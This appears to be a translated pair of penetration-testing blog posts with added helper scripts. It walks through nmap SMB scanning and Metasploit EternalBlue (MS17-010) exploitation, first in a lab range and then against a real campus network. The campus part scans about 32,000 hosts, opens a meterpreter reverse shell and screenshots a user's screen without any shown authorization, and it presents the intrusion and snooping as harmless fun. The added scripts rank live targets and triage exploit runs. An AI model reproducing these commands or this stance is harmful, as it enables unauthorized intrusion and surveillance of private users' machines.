0x00 Preface
I have not updated this blog for a long time, mainly because work has been busy and writing posts takes a lot of time. But I suddenly noticed that after a long break many things are getting rusty, so I have decided to start writing some penetration-testing articles from today. Think of them as study notes, kept as a technical record and reference for later.
0x01 Case study
Lab environment:
- Target range: 10.11.1.0/24
- Attack box: Kali Linux (10.11.0.79)
Information gathering:
Scan for hosts running SMB. `-oG` writes grepable output with one host per line, so `cut -d" " -f2` pulls the IP; the `grep -i windows` pass relies on the OS detection that `-A` adds, while the `grep -i open` pass collects every host with 139 or 445 open (19 hosts in this run) into smb_server_all.txt:
# nmap -A -p 139,445 10.11.1.1-254 -oG smb_service.txt
# cat smb_service.txt | grep -i windows | cut -d" " -f2
10.11.1.5
10.11.1.31
10.11.1.49
10.11.1.50
10.11.1.73
10.11.1.128
10.11.1.145
10.11.1.202
10.11.1.218
10.11.1.220
10.11.1.223
10.11.1.227
10.11.1.229
10.11.1.230
# cat smb_service.txt | grep -i open | cut -d" " -f2 > smb_server_all.txt
Scan those hosts with every smb-vuln-* NSE script. `cut -d"/" -f6` yields the script file name for `--script`; the final `grep IDs:` only tallies matches (4 hits for CVE-2009-3103, 13 for CVE-2017-0143) without saying which host each finding belongs to, so the per-script -oN files still have to be read:
# find / -name smb*vuln*.nse
/usr/share/nmap/scripts/smb-vuln-cve2009-3103.nse
/usr/share/nmap/scripts/smb-vuln-ms06-025.nse
/usr/share/nmap/scripts/smb-vuln-cve-2017-7494.nse
/usr/share/nmap/scripts/smb-vuln-ms07-029.nse
/usr/share/nmap/scripts/smb-vuln-ms17-010.nse
/usr/share/nmap/scripts/smb-vuln-conficker.nse
/usr/share/nmap/scripts/smb-vuln-ms08-067.nse
/usr/share/nmap/scripts/smb-vuln-regsvc-dos.nse
/usr/share/nmap/scripts/smb-vuln-ms10-054.nse
/usr/share/nmap/scripts/smb-vuln-ms10-061.nse
# for vul in $(find / -name smb*vuln*.nse | cut -d"/" -f 6); do nmap -v -p 139,445 --script=$vul -iL smb_server_all.txt -oN smb_vulns_$vul.txt; done
# cat smb_vulns_smb-vuln-*.txt | grep IDs:
|     IDs:  CVE:CVE-2009-3103
|     IDs:  CVE:CVE-2009-3103
|     IDs:  CVE:CVE-2009-3103
|     IDs:  CVE:CVE-2009-3103
|     IDs:  CVE:CVE-2017-0143
|     IDs:  CVE:CVE-2017-0143
|     IDs:  CVE:CVE-2017-0143
|     IDs:  CVE:CVE-2017-0143
|     IDs:  CVE:CVE-2017-0143
|     IDs:  CVE:CVE-2017-0143
|     IDs:  CVE:CVE-2017-0143
|     IDs:  CVE:CVE-2017-0143
|     IDs:  CVE:CVE-2017-0143
|     IDs:  CVE:CVE-2017-0143
|     IDs:  CVE:CVE-2017-0143
|     IDs:  CVE:CVE-2017-0143
|     IDs:  CVE:CVE-2017-0143
Exploitation:
Check which hosts nmap flags as vulnerable to MS17-010 (CVE-2017-0143):
# cat ../scripts/smb_vulns_smb-vuln-ms17-010.nse.txt
# Nmap 7.50 scan initiated Mon Jul 3 13:57:06 2017 as: nmap -v -p 139,445 --script=smb-vuln-ms17-010.nse -iL smb_server_all.txt -oN smb_vulns_smb-vuln-ms17-010.nse.txt
Nmap scan report for 10.11.1.5
Host is up (0.24s latency).
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:50:56:89:35:AF (VMware)

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
... ...
Nmap scan report for 10.11.1.220
Host is up (0.24s latency).
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:50:56:89:15:14 (VMware)

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
... ...
Nmap scan report for 10.11.1.230
Host is up (0.25s latency).
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:50:56:89:5C:19 (VMware)

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Read data files from: /usr/bin/../share/nmap
# Nmap done at Mon Jul 3 13:57:53 2017 -- 19 IP addresses (19 hosts up) scanned in 46.85 seconds
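The `grep IDs:` tally above loses which host each finding belongs to, and `grep -i open` also keeps hosts that only expose 139/tcp. The helper below is an added example (mine, not part of the original post) that parses the same two nmap outputs, the -oG host list and the -oN script reports, into a "host script CVE" table. Both sample inputs are constructed in nmap's output format from the hosts shown above; the port states, the NOT VULNERABLE entry for 10.11.1.31 and the CVE-2009-3103 finding for 10.11.1.49 are made up for illustration.

```shell
#!/bin/sh
# Added helper, not part of the original post: join the two nmap outputs used
# above into a "host script CVE" table instead of counting "IDs:" lines.

# Constructed -oG (grepable) sample; hosts taken from the scan above, port
# states made up so that one host has only 139/tcp open.
GNMAP_SAMPLE='# Nmap 7.50 scan initiated as: nmap -A -p 139,445 10.11.1.1-254 -oG smb_service.txt
Host: 10.11.1.5 ()  Status: Up
Host: 10.11.1.5 ()  Ports: 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///  OS: Microsoft Windows 7
Host: 10.11.1.31 ()  Ports: 139/closed/tcp//netbios-ssn///, 445/closed/tcp//microsoft-ds///
Host: 10.11.1.49 ()  Ports: 139/open/tcp//netbios-ssn///, 445/filtered/tcp//microsoft-ds///
Host: 10.11.1.220 ()  Ports: 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///  OS: Microsoft Windows Server 2008 R2
# Nmap done at Mon Jul 3 13:41:02 2017 -- 254 IP addresses (19 hosts up) scanned'

# Constructed -oN sample: two script reports concatenated, as
# `cat smb_vulns_smb-vuln-*.txt` would produce.
NSE_SAMPLE='# Nmap 7.50 scan initiated as: nmap -v -p 139,445 --script=smb-vuln-ms17-010.nse -iL smb_server_all.txt -oN smb_vulns_smb-vuln-ms17-010.nse.txt
Nmap scan report for 10.11.1.5
Host is up (0.24s latency).
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
Nmap scan report for 10.11.1.31
Host is up (0.20s latency).
Host script results:
| smb-vuln-ms17-010:
|   NOT VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: NOT VULNERABLE
|     IDs:  CVE:CVE-2017-0143
Nmap scan report for 10.11.1.220
Host is up (0.24s latency).
Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
# Nmap done at Mon Jul 3 13:57:53 2017 -- 19 IP addresses (19 hosts up) scanned in 46.85 seconds
# Nmap 7.50 scan initiated as: nmap -v -p 139,445 --script=smb-vuln-cve2009-3103.nse -iL smb_server_all.txt -oN smb_vulns_smb-vuln-cve2009-3103.nse.txt
Nmap scan report for 10.11.1.49
Host is up (0.21s latency).
Host script results:
| smb-vuln-cve2009-3103:
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103'

# Hosts with 445/tcp open, from -oG output on stdin. Unlike the post's
# `grep -i open`, a host that only has 139/tcp open is left out.
smb_hosts() {
    awk '$1 == "Host:" && /[ ,]445\/open\/tcp/ { print $2 }' | LC_ALL=C sort -u
}

# Findings from -oN script reports on stdin (several files may be concatenated).
# Prints "host script CVE" for every result whose State is VULNERABLE or
# LIKELY VULNERABLE; NOT VULNERABLE entries (shown with vulns.showall) are skipped.
vuln_table() {
    awk '
        /^Nmap scan report for/ { host = $NF; gsub(/[()]/, "", host); script = ""; state = "" }
        /^[|] smb-vuln-[^:]+:/  { script = $2; sub(/:$/, "", script); state = "" }
        /State: /               { state = $0; sub(/.*State: */, "", state); sub(/ +$/, "", state) }
        /IDs: / && state ~ /VULNERABLE/ && state !~ /NOT/ {
            ids = $0; sub(/.*IDs: */, "", ids); sub(/^CVE:/, "", ids)
            print host, script, ids
        }
    '
}

report() {
    echo "== hosts with 445/tcp open =="
    printf '%s\n' "$GNMAP_SAMPLE" | smb_hosts
    echo "== vulnerable hosts (host script CVE) =="
    printf '%s\n' "$NSE_SAMPLE" | vuln_table
}
report
```

On the real files the two functions are used as `smb_hosts < smb_service.txt > smb_server_all.txt` and `cat smb_vulns_smb-vuln-*.txt | vuln_table`; the table is what the exploitation step below actually needs, one line per host and CVE.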
10.11.1.5: exploitation fails. The module has a single target (id 0: Windows 7 and Server 2008 R2 x64, all service packs) and VerifyTarget compares it with the OS reported in the SMB reply; the mismatch aborts the run before the exploit is sent:
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST                                yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

msf exploit(ms17_010_eternalblue) > set RHOST 10.11.1.5
RHOST => 10.11.1.5
msf exploit(ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 10.11.0.79:4444
[*] 10.11.1.5:445 - Connecting to target for exploitation.
[+] 10.11.1.5:445 - Connection established for exploitation.
[!] 10.11.1.5:445 - Target OS selected not valid for OS indicated by SMB reply
[!] 10.11.1.5:445 - Disable VerifyTarget option to proceed manually...
[-] 10.11.1.5:445 - Unable to continue with improper OS Target.
[*] Exploit completed, but no session was created.
10.11.1.230: also fails. The OS check now passes (the SMB reply identifies the host as Windows 7 Ultimate N 7600), but VerifyArch finds that the architecture indicated by the DCE/RPC reply is not the x64 build the single target covers, so the run stops. Disabling VerifyArch to push through against the wrong architecture would at best fail and at worst crash the host:
msf exploit(ms17_010_eternalblue) > set RHOST 10.11.1.230
RHOST => 10.11.1.230
msf exploit(ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 10.11.0.79:4444
[*] 10.11.1.230:445 - Connecting to target for exploitation.
[+] 10.11.1.230:445 - Connection established for exploitation.
[+] 10.11.1.230:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.11.1.230:445 - CORE raw buffer dump (25 bytes)
[*] 10.11.1.230:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 10.11.1.230:445 - 0x00000010  74 65 20 4e 20 37 36 30 30                       te N 7600
[!] 10.11.1.230:445 - Target arch selected not valid for arch indicated by DCE/RPC reply
[!] 10.11.1.230:445 - Disable VerifyArch option to proceed manually...
[-] 10.11.1.230:445 - Unable to continue with improper OS Arch.
[*] Exploit completed, but no session was created.
10.11.1.220 (Windows Server 2008 R2 Standard 7601 Service Pack 1): both checks pass, the exploit runs and a shell comes back (the captured output below stops mid-run):
msf exploit(ms17_010_eternalblue) > set RHOST 10.11.1.220
RHOST => 10.11.1.220
msf exploit(ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 10.11.0.79:4444
[*] 10.11.1.220:445 - Connecting to target for exploitation.
[+] 10.11.1.220:445 - Connection established for exploitation.
[+] 10.11.1.220:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.11.1.220:445 - CORE raw buffer dump (51 bytes)
[*] 10.11.1.220:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 10.11.1.220:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard
[*] 10.11.1.220:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
[*] 10.11.1.220:445 - 0x00000030  6b 20 31                                         k 1
[+] 10.11.1.220:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.11.1.220:445 - Trying exploit with 12 Groom Allocations.
[*] 10.11.1.220:445 - Sending all but last fragment of exploit packet
[*] 10.11.1.220:445 - Starting non-paged pool grooming
[+] 10.11.1.220:445 - Sending SMBv2 buffers
[+] 10.11.1.220:445 - Closing SMBv1 connection creating free hole adjacent

Hands-on: using MSF to batch-scan a campus network for hosts with the MS17-010 vulnerability and break in
*Original author: TimeShatter. This article is part of the FreeBuf original-content reward programme; reproduction without permission is prohibited.
EternalBlue, which exploits MS17-010, was all the rage a while ago, and the campus network claimed to have blocked the relevant ports. I have recently been digging deeper into MSF, hence this post.
MS17-010 scanner
MSF's auxiliary modules include a capable MS17-010 scanner:
auxiliary/scanner/smb/smb_ms17_010
It quickly scans a subnet for hosts that have the MS17-010 vulnerability, and it is simple to use.
First decide the range to scan. Taking my university's campus LAN as an example, the range is 10.31.0.0/16; in practice, testing showed that scanning 10.31.0-128.1-254 is enough.
The commands are:
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 10.31.0-128.1-254
set threads 512
exploit
Part of the scan output is shown in the original screenshot, which is not reproduced here:
In that output, hosts marked with a green plus on the left and identified as Windows 7 are very likely to have the vulnerability and to be exploitable. Hosts identified as Windows 8 or Windows 10 basically cannot be exploited this way: the exploit module's only target is Windows 7 / Server 2008 R2 x64 (see its target list above), whatever the scanner says about them. Once you have tried all the Windows 7 hosts and none of them gave you a shell, move on to the hosts marked with a red minus whose OS version was not identified.
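Added example (not from the original post): a filter that turns saved smb_ms17_010 scanner output into a prioritised target list following the rule above, Windows 7 / Server 2008 R2 x64 first, flagged hosts with no OS string next, then Windows 7 on x86 (VerifyArch rejects it) and Windows 8/10 (not a module target), and last the hosts the scanner reports as not vulnerable. The sample lines are constructed; the exact wording of the scanner's messages ("Host is likely VULNERABLE to MS17-010!" followed by the OS string) is assumed from the module's output format and may differ between Metasploit versions.

```shell
#!/bin/sh
# Added example, not from the original post: order smb_ms17_010 scanner output
# into the try-first / try-later buckets described above.

# Constructed scanner lines. The message format is assumed from the module's
# output and may differ between Metasploit versions.
SCAN_SAMPLE='[+] 10.31.36.66:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[+] 10.31.36.103:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[+] 10.31.40.12:445      - Host is likely VULNERABLE to MS17-010! - Windows 10 Pro 10240 x64 (64-bit)
[-] 10.31.40.13:445      - Host does NOT appear vulnerable.
[+] 10.31.41.7:445       - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
[+] 10.31.41.9:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate N 7600 x86 (32-bit)
[+] 10.31.50.2:445       - Host is likely VULNERABLE to MS17-010!
[*] Scanned 256 of 32512 hosts (0% complete)'

# Tiers: 1 = Windows 7 / Server 2008 R2 x64, the only target of
# ms17_010_eternalblue; 2 = flagged but no OS string; 3 = Windows 7 / 2008 R2
# on x86 (VerifyArch will reject it); 4 = Windows 8/10/2012+ (not a module
# target); 5 = scanner says not vulnerable. Output: "tier host os".
prioritize_targets() {
    awk '
        /^\[\+\]/ && /likely VULNERABLE/ {
            ip = $2; sub(/:[0-9]+$/, "", ip)
            os = $0
            if (sub(/.*MS17-010! - /, "", os) == 0) os = "(os not reported)"
            if (os == "(os not reported)")                          tier = 2
            else if (os ~ /Windows 7( |$)|Windows Server 2008 R2/)  tier = (os ~ /x86|32-bit/) ? 3 : 1
            else if (os ~ /Windows (8|10|Server 201)/)              tier = 4
            else                                                    tier = 2
            print tier, ip, os
        }
        /^\[-\]/ {
            ip = $2; sub(/:[0-9]+$/, "", ip)
            print 5, ip, "(scanner reports not vulnerable)"
        }
    ' | LC_ALL=C sort -k1,1n -k2,2
}

printf '%s\n' "$SCAN_SAMPLE" | prioritize_targets
```

With a real run saved via `spool scan.log` in msfconsole, `prioritize_targets < scan.log | awk '$1 == 1 { print $2 }'` gives the list to feed to the exploit module first.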
With targets in hand, on to the break-in!
Exploiting MS17-010
MSF's exploit modules include the MS17-010 exploit:
exploit/windows/smb/ms17_010_eternalblue
It is equally simple to use: set the target host's IP and a payload, then exploit.
Note that if the exploit does not succeed on the first try, avoid a second attempt: a failed run can easily leave the target crashed.
The commands are:
use exploit/windows/smb/ms17_010_eternalblue
set rhost 10.31.36.66
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.31.30.49
set lport 4567
exploit
Here 10.31.36.66 is the target, 10.31.30.49 is the host that listens for the reverse connection (your own machine), and the listening port is 4567.
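Added example (not from either post) that covers the three outcomes shown in the case study above (OS mismatch on 10.11.1.5, arch mismatch on 10.11.1.230, a session on 10.11.1.220) together with the "do not retry" advice here: a triage script that reads a saved msfconsole transcript, recovers each host's OS banner from the CORE raw buffer dump hex rows, counts exploit attempts per host and classifies the result, flagging hosts that were retried after a failure. The transcript is constructed from the lines shown earlier plus a hypothetical second attempt against 10.11.1.5 and a hypothetical "Meterpreter session 1 opened" line for 10.11.1.220; the original output is cut off before that point.

```shell
#!/bin/sh
# Added example, not from either post: triage a saved msfconsole transcript of
# ms17_010_eternalblue runs (save one with `spool eb.log` in msfconsole).
# Output: "host<TAB>attempts<TAB>result<TAB>banner".

# Constructed transcript: the lines shown for 10.11.1.5, .230 and .220 above,
# plus a hypothetical second attempt on 10.11.1.5 and a hypothetical
# "Meterpreter session 1 opened" line (the original output stops earlier).
MSF_LOG='[*] Started reverse TCP handler on 10.11.0.79:4444
[*] 10.11.1.5:445 - Connecting to target for exploitation.
[+] 10.11.1.5:445 - Connection established for exploitation.
[!] 10.11.1.5:445 - Target OS selected not valid for OS indicated by SMB reply
[-] 10.11.1.5:445 - Unable to continue with improper OS Target.
[*] Exploit completed, but no session was created.
[*] 10.11.1.5:445 - Connecting to target for exploitation.
[!] 10.11.1.5:445 - Target OS selected not valid for OS indicated by SMB reply
[*] Exploit completed, but no session was created.
[*] 10.11.1.230:445 - Connecting to target for exploitation.
[+] 10.11.1.230:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.11.1.230:445 - CORE raw buffer dump (25 bytes)
[*] 10.11.1.230:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 10.11.1.230:445 - 0x00000010  74 65 20 4e 20 37 36 30 30                       te N 7600
[!] 10.11.1.230:445 - Target arch selected not valid for arch indicated by DCE/RPC reply
[-] 10.11.1.230:445 - Unable to continue with improper OS Arch.
[*] Exploit completed, but no session was created.
[*] 10.11.1.220:445 - Connecting to target for exploitation.
[+] 10.11.1.220:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.11.1.220:445 - CORE raw buffer dump (51 bytes)
[*] 10.11.1.220:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 10.11.1.220:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard
[*] 10.11.1.220:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
[*] 10.11.1.220:445 - 0x00000030  6b 20 31                                         k 1
[+] 10.11.1.220:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.11.1.220:445 - Trying exploit with 12 Groom Allocations.
[*] Meterpreter session 1 opened (10.11.0.79:4444 -> 10.11.1.220:49158) at 2017-07-03 14:05:11 +0800'

triage_eternalblue() {
    awk '
        function hexval(h,    i, v) {            # "6b" -> 107; POSIX awk has no strtonum()
            v = 0
            for (i = 1; i <= length(h); i++)
                v = v * 16 + index("0123456789abcdef", tolower(substr(h, i, 1))) - 1
            return v
        }
        # module lines look like "[x] IP:PORT - message"; remember the host they belong to
        $2 ~ /^[0-9.]+:[0-9]+$/ {
            ip = $2; sub(/:[0-9]+$/, "", ip)
            if (!(ip in seen)) { seen[ip] = 1; order[++n] = ip }
        }
        /Connecting to target for exploitation/ { attempts[ip]++ }
        /CORE raw buffer dump/ {                  # header carries the banner length in bytes
            match($0, /\([0-9]+ bytes\)/)
            left[ip] = substr($0, RSTART + 1, RLENGTH - 8) + 0
            banner[ip] = ""
        }
        / - 0x[0-9a-fA-F]+ / && left[ip] > 0 {    # dump rows: offset, up to 16 hex bytes, ASCII gutter
            for (f = 1; f <= NF; f++) if ($f ~ /^0x[0-9a-fA-F]+$/) break
            take = left[ip] < 16 ? left[ip] : 16  # decode from the hex, not the lossy ASCII column
            for (j = 1; j <= take; j++) banner[ip] = banner[ip] sprintf("%c", hexval($(f + j)))
            left[ip] -= take
        }
        /Target OS selected not valid/   { result[ip] = "OS_MISMATCH" }
        /Target arch selected not valid/ { result[ip] = "ARCH_MISMATCH" }
        /Meterpreter session [0-9]+ opened/ {     # target is the right-hand side of "->"
            match($0, /-> [0-9.]+:/)
            ip = substr($0, RSTART + 3, RLENGTH - 4)
            result[ip] = "SESSION"
        }
        END {
            for (i = 1; i <= n; i++) {
                ip = order[i]
                r = (ip in result) ? result[ip] : "NO_SESSION"
                if (attempts[ip] > 1 && r != "SESSION") r = r "_RETRIED"
                printf "%s\t%d\t%s\t%s\n", ip, attempts[ip], r, ((ip in banner) ? banner[ip] : "-")
            }
        }
    '
}

printf '%s\n' "$MSF_LOG" | triage_eternalblue
```

A host that shows `OS_MISMATCH` needs a different exploit target, not another run; one that shows `ARCH_MISMATCH` is not reachable with this module's x64-only target; anything tagged `_RETRIED` is exactly the case the warning above is about.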
That host did not work; below is a screenshot (not reproduced here) of another host that was compromised successfully:
As the screenshot shows, host 10.31.36.103 was compromised successfully :).
Then type screenshot to see what the owner is doing.
screenshot
Well, watching an LoL match 0.0.
I'll just have a quick look at whether there are any action films worth downloading on the machine, then upload a txt reminding them to patch. We are principled white hats, right :).
That concludes discovering and compromising MS17-010 hosts with MSF. Scanning the campus network showed that the majority of hosts still have this vulnerability...